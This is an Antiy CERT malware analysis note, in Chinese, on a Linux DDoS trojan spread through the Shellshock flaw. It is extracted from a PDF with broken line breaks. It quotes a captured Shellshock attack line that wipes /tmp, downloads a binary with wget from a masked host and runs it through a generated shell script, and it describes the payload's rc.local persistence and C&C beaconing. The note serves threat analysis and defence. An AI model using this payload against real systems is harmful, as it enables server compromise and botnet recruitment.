Trojan[DDOS]/Linux.

Znaich分析笔记安天安全研究与应急处理中心(AntiyCERT)Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第2页目录编者按.
11概述.
12感染源.
13样本分析.
34总结.
7附录一:参考资料.
7附录二:关于安天.
7Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第1页编者按安天CERT这篇分析笔记完成于2015年1月18日,但撰写后并未公开,为让安全工作者更进一步了解IoT僵尸网络的威胁,安天CERT决定公开本报告,作为《IOT僵尸网络严重威胁网络基础设施安全》一文的参考资料.
1概述安天CERT关注到近期针对Linux平台的木马十分活跃.
2015年1月13日,MalwareMustDie的日本工作人员HendrikAdrian在推特上发出其分析样本的截图,在1月14日MalwareMustDie官网博客发出分析报告.
有趣的是,同是在1月14日,HendrikAdrian发推表示XOR.
DDoS又回来了,该家族早在2014年9月就已经出现,但也有安全媒体发表文章却称该恶意代码是"新型木马",Avast的报告中也说明了XOR.
DDoS自2014年9月末就已经出现,因此可以得出"新型木马的结论"声音并没有对此事件进行深入研究.
从各方报告来看,1月13日出现的样本与1月14日出现的XOR.
DDoS样本没有关联,下面对1月13日出现的样本进行分析.
2感染源该恶意代码在2015年1月13日被发现,通过"破壳"漏洞进行攻击,根据MalwareMustDie的报告,以下是被检测到的攻击代码:[13/Jan/2015:06:07:18+0100]"GET/HTTP/1.
1"200311bin/bash-c\"rm-rf/tmp/*;echowgethttp://xxxx:81/9521-O/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echoechoByChina.
Z>>/tmp/Run.
sh;echochmod777/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echo/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echorm-rf/tmp/Run.
sh>>/tmp/Run.
sh;chmod777/tmp/Run.
sh;/tmp/Run.
sh\""它利用"破壳"漏洞下载文件至/tmp文件夹中,通过sh脚本运行.
在2015年1月14日MalwareMustDie的报告中,该C&C服务器包含9521及ck.
exe两个文件:Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第2页而在1月16日下午13:19:49秒时,文件已经被替换:Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第3页从截图上看,有359人下载了名为9521的恶意代码.
而另一个名为ck.
exe的文件则是一个漏洞扫描器,恶意代码通过它进行传播.
3样本分析首先分析样本ck.
exe:原始文件名ck.
exeMD54E337BE817E4A667FA695E7980B8B851处理器架构X86-32文件大小1.
7MB(1816064bytes)文件格式BinExecute/Microsoft:EXE[:X86]时间戳2014-11-0804:09:02数字签名NO加壳类型无编译语言MicrosoftVisualC++VT首次上传时间2015-01-1308:05:48VT检测结果5/57病毒名称Trojan/Linux.
ShellShock判定结果恶意Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第4页1、运行后会弹出帮助可以看出,它有三个参数:HostFile、Threads、Address,HostFile为txt格式,内容为扫描的目标ip地址,Threads则是线程数量,Address就是恶意代码的地址.
2、对其反汇编,发现了MalwareMustDie报告中提到了攻击代码,可以看出,该样本扫描有"破壳"漏洞的机器,下载恶意代码并运行下面分析载荷文件9521:原始文件名9521MD5B7E3CA05806AA99CAD9D3768FF90F1D9处理器架构X86-32文件大小604.
4KB(618948bytes)文件格式BinExecute/ELF[:X86]数字签名NO加壳类型无VT首次上传时间2015-01-1306:04:59VT检测结果17/55病毒名称Trojan[DDOS]/Linux.
Znaich判定结果恶意1、样本运行后首先获取系统信息,包括系统版本(通过调用uname())系统时间(调用gettimeofday())Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第5页CPU核心数量及时钟频率(取自/proc/cpuinfo)CPU负载(取自/proc/stat)空闲内存大小及内存总量(取自/proc/meminfo)2、修改rc.
local(利用sed命令):删除末尾的exit0在第二行增加字符串"//ChinaZ"3、解密硬编码的C&C服务器地址Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第6页4、与C&C服务器通信,将之前获取的系统信息通过TCP数据包进行发送5、使用Keep-alive机制检测C&C服务器是否存活Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第7页4总结该样本通过"破壳"漏洞进行传播,为常见的DDOS攻击样本.
但扫描器时间戳为2014年11月,并且攻击者重新上传的样本文件也为2014年的DDOS攻击样本,说明该作者一直在利用"破壳"漏洞进行攻击.
附录一:参考资料[1]来源:MalwareMustDiehttp://blog.
malwaremustdie.
org/2015/01/mmd-0030-2015-new-elf-malware-on.
htmlhttp://pastebin.
com/raw.
phpi=gf4xrB9n[2]来源:KernerMode.
infohttp://www.
kernelmode.
info/forum/viewtopic.
phpf=16&t=3682&sid=7984f41ec2f98ab870c5a613a116d99e附录二:关于安天安天从反病毒引擎研发团队起步,目前已发展成为以安天实验室为总部,以企业安全公司、移动安全公司为两翼的集团化安全企业.
安天始终坚持以安全保障用户价值为企业信仰,崇尚自主研发创新,在安全检测引擎、移动安全、网络协议分析还原、动态分析、终端防护、虚拟化安全等方面形成了全能力链布局.
安天的监控预警能力覆盖全国、产品与服务辐射多个国家.
安天将大数据分析、安全可视化等方面的技术与产品体系有效结合,以海量样本自动化分析平台延展工程师团队作业能力、缩短产品响应周期.
结Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第8页合多年积累的海量安全威胁知识库,综合应用大数据分析、安全可视化等方面经验,推出了应对高级持续性威胁(APT)和面向大规模网络与关键基础设施的态势感知与监控预警解决方案.
全球超过三十家以上的著名安全厂商、IT厂商选择安天作为检测能力合作伙伴,安天的反病毒引擎得以为全球近十万台网络设备和网络安全设备、近两亿部手机提供安全防护.
安天移动检测引擎是全球首个获得AV-TEST年度奖项的中国产品.
安天技术实力得到行业管理机构、客户和伙伴的认可,安天已连续四届蝉联国家级安全应急支撑单位资质,亦是中国国家信息安全漏洞库六家首批一级支撑单位之一.
安天是中国应急响应体系中重要的企业节点,在红色代码、口令蠕虫、震网、破壳、沙虫、方程式等重大安全事件中,安天提供了先发预警、深度分析或系统的解决方案.
关于反病毒引擎更多信息请访问:http://www.
antiy.
com(中文)http://www.
antiy.
net(英文)安天企业安全公司更多信息请访问:http://www.
antiy.
cn安天移动安全公司(AVLTEAM)更多信息请访问:http://www.
avlsec.
com